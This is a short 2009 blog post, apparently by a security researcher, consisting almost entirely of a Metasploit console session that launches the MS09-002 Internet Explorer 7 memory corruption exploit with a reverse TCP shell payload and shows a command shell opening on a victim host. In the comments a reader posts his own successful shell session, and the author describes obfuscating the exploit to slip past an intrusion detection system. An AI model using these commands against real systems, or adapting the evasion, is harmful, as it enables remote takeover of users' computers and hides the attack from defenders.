Wednesday, February 18, 2009

MS09_002 Memory Corruption Exploit


Details to follow. :-)

msf > use exploit/windows/browser/ms09_002
msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms09_002) > set LPORT 1701
LPORT => 1701
msf exploit(ms09_002) > set LHOST 10.10.10.15
LHOST => 10.10.10.15
msf exploit(ms09_002) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ms09_002) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms09_002) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002) >
[*] Handler binding to LHOST 10.10.10.15
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/ie7.html
[*] Local IP: http://10.10.10.15:80/ie7.html
[*] Server started.
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 10.10.10.1:1865...
[*] Command shell session 1 opened (10.10.10.15:1701 -> 10.10.10.1:4387)
dean de beer

6 comments:

Anonymous said...

Hmmmm... sounds great !! Can't wait for the juicy details ;)

Anonymous said...

install linux problem solved

Anonymous said...

got mine!

msf exploit(ms09_002) > sessions -l -v

Active sessions
===============

Id Description Tunnel Via
-- ----------- ------ ---
1 Command shell 172.10.1.100:1975 -> 172.10.1.104:1116 windows/browser/ms09_002

msf exploit(ms09_002) >

..thanks for the sample malware dean!!

dean de beer said...

No worries. Happy to help. :) I just need to finish off the obfuscation of the variables in mine and it's done.

I tested it through ISS's IDS and it's catching the shellcode and nops right now and not the trigger itself although that does not seem easy to alert on.

CG said...

w00t!

Anonymous said...

w00t! i didn't got mine! :(